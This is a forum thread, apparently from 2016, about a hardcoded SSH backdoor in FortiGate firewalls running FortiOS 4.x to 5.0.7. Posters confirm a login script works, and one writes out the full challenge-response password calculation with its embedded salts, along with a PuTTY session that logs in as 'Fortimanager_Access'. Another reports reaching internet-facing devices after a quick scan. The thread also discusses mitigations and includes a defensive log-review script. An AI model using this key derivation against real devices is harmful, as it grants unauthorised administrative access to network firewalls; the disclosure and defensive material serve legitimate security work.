SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
http://seclists.org/fulldisclosure/2016/Jan/26
I have not had a chance to try this. I don't see any threads discussing it. So, I thought I'd share.
Is there any comment from the Fortinet technical team on it? Very keen to know.
The guy here on Twitter confirms that he has the backdoor working.
I have tried the script out there and have not been able to get it to work. Until we get some answer from Fortinet I'm going to keep at it.
Tried it on a 5.0.7 version and it works.
The script logs in without any password prompt.
Confirming the script works. I just tested on a fresh FGVM running 5.0.6 and it logs in automatically...
~/Desktop $ ./fgt_ssh_backdoor.py 192.168.100.200
FortiGate-VM64 # get sys status
Version: FortiGate-VM64 v5.0,build0271,140124 (GA Patch 6)
Virus-DB: 16.00560(2012-10-19 08:31)
Extended DB: 1.00000(2012-10-17 15:46)
IPS-DB: 4.00345(2013-05-23 00:39)
IPS-ETDB: 0.00000(2001-01-01 00:00)
Serial-Number: FGVMEV0000000000
I just did a quick search for FortiGates online running SSH and after 10 minutes was able to connect to 4... this is going to hurt some people methinks...
I noticed that there is no log saved for the actual SSH connection from the script. The only time I was able to see a log entry was when I changed the config (user: Fortimanager_Access).
Thanks for sharing Mike.
I've got mixed results. This one works:
Version: FortiGate-VM64 v5.0,build0128,121101 (GA)
But I was unable to access my FG-111C:
Fortigate-111C v4.0,build0639,120906 (MR3 Patch 10)
Don't know... maybe it's because I did a downgrade from 5.2. Or they have different salts.
For those who don't want to dig too deep into this, this is all the magic:
If you connect to SSH with the user 'Fortimanager_Access' you'll receive a challenge.
Then you can calculate the dynamic password based on this dword challenge:
# sketch of the calculation; uses Python's hashlib and base64 modules
n = $SSH_Challenge            # the challenge string shown at the keyboard-interactive prompt
m = hashlib.sha1()
m.update('\x00' * 12)
m.update(n + 'FGTAbc11*xy+Qqz27')
m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
$Dynamic_Password = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
Putty:
login as: Fortimanager_Access
Using keyboard-interactive authentication. -840056459
Access denied
Using keyboard-interactive authentication. -1914958026
Access denied
Using keyboard-interactive authentication. -1378285763
AK1AAAAAAAAAAAAAAAAmWT0TKGMI23Iq4Q9P42z0PwpYBQ=
FortiGate-VM64 #
This only works if you have SSH access. So by limiting the IP ranges for all admin users, you can mitigate the threat.
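A defender-side check that follows from two observations in this thread (config changes made over the backdoor are logged under user Fortimanager_Access, and the workable mitigation is restricting the source addresses admins may log in from). This is an added example, not code from the thread, the disclosure or Fortinet; it assumes FortiOS key=value syslog lines with `user`, `ui` and `action` fields, and the log lines and trusted range below are constructed.

```python
import ipaddress
import re
import shlex

# Constructed FortiOS-style event log lines (key=value syslog), not captured from a real device.
SAMPLE_LOGS = [
    'date=2016-01-13 time=10:01:02 type=event subtype=system level=information '
    'user="admin" ui=ssh(10.0.0.5) action=login status=success '
    'msg="Administrator admin logged in successfully from ssh(10.0.0.5)"',
    'date=2016-01-13 time=10:05:17 type=event subtype=system level=information '
    'user="Fortimanager_Access" ui=ssh(198.51.100.7) action=Edit cfgpath="system.admin" '
    'msg="Edit system.admin admin"',
    'date=2016-01-13 time=10:07:40 type=event subtype=system level=information '
    'user="admin" ui=ssh(203.0.113.9) action=login status=success '
    'msg="Administrator admin logged in successfully from ssh(203.0.113.9)"',
    'date=2016-01-13 time=10:09:00 type=event subtype=system level=information '
    'user="admin" ui=https(10.0.0.5) action=logout status=success '
    'msg="Administrator admin logged out from https(10.0.0.5)"',
]

TRUSTED_ADMIN_NETS = [ipaddress.ip_network("10.0.0.0/24")]  # assumed: the ranges set as trusthosts
BACKDOOR_USER = "Fortimanager_Access"
UI_RE = re.compile(r"^(?P<proto>[a-z]+)\((?P<ip>[0-9.]+)\)$")  # matches ui=ssh(10.0.0.5)


def parse_fortios_line(line):
    """Split one key=value FortiOS log line into a dict; shlex keeps quoted values intact."""
    fields = {}
    for token in shlex.split(line):
        key, sep, value = token.partition("=")
        if sep:
            fields[key] = value
    return fields


def review(lines, trusted_nets=TRUSTED_ADMIN_NETS):
    """Return (reason, line) pairs for entries an operator should look at."""
    findings = []
    for line in lines:
        f = parse_fortios_line(line)
        # Any activity under the backdoor account is a finding on its own.
        if f.get("user") == BACKDOOR_USER:
            findings.append(("backdoor user active", line))
            continue
        # SSH admin logins from outside the trusted ranges mean the mitigation is not in place.
        m = UI_RE.match(f.get("ui", ""))
        if m and m.group("proto") == "ssh" and f.get("action") == "login":
            src = ipaddress.ip_address(m.group("ip"))
            if not any(src in net for net in trusted_nets):
                findings.append(("ssh admin login from untrusted source", line))
    return findings
```

Note that the SSH session itself is not logged (as observed above), so the check can only catch the account once it touches configuration, which is why the untrusted-source login check matters as well.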
If you enable an SSH key it seems like it results in a fix. Can anybody confirm this on their FGT? (Upload an SSH key from the CLI and retest.)
PCNSE
NSE
StrongSwan
Like this?
login as: admin
Authenticating with public key "rsa-key-20160113"
FortiGate-VM64 # conf sys admin
FortiGate-VM64 (admin) # show
config system admin
edit "admin"
set accprofile "super_admin"
set vdom "root"
set ssh-public-key1 "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArnvrfeRc/Dp29mYq6Yp4YqHSYzvdsGiwvt5I+5PiQKACosqED4L6OApvXBtEsJz7XMJct9cADHxgajn2UrxDUxgjec3/4NVYkq9/jHm1X0y5MbgLb5X2ftDQNqM3gzO2vk6ZRCN9kyq4oCs0V2ynZYnjp8Q8/pRYAm/Y4DhE8s+SZKhDHNq6R3q4wc9IPWgAiWSGCsaPPGH2+3cYlvwQRDyva5RsWZPz4WhLm33A+/rl+4CBXY70mlPuXN3xvps 9IGTb0yYA0H03tfGbKxaQdEArFe4nh30b8gTZALtWJ3lNE1Y8oq3zVYrnfDIzmtNsCY/NnaSKi9bQMH0TcRjEUQ== rsa-key-20160113"
config dashboard-tabs
<snip>
end
config dashboard
<snip>
end
set password ENC AK1nds6rsH4pi3VuVI9jjtvaXR1fZjp5v8Stds1F03wrqA=
next
end
FortiGate-VM64 (admin) #
Still able to access with the FortiManager user.
